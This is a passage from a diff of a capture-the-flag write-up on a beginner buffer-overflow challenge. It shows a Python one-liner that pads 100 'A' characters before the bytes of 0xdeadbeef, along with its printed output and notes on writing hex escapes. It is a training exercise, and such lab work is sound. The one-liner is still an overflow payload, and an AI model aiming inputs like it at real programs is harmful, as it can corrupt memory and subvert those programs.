Moataz-AbdElKhalek/hackable.ca_writeups/pwnables/buffer overflow/buffer overflow1.md

 print('A'*100+'\xef\xbe\xad\xde')`
 >>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAﾭ�
 ```
+>Note: To not get confused with the hex to ASCII conversion, we can just enter the hex value as `\xXX` to python and it will automatically make the conversion for us.
->note the special chars at the end representing the hex value `0xdeadbeef`
+>Note: The special chars at the end representing the hex value `0xdeadbeef`

 By entering this value into the program, it gives the FLAG.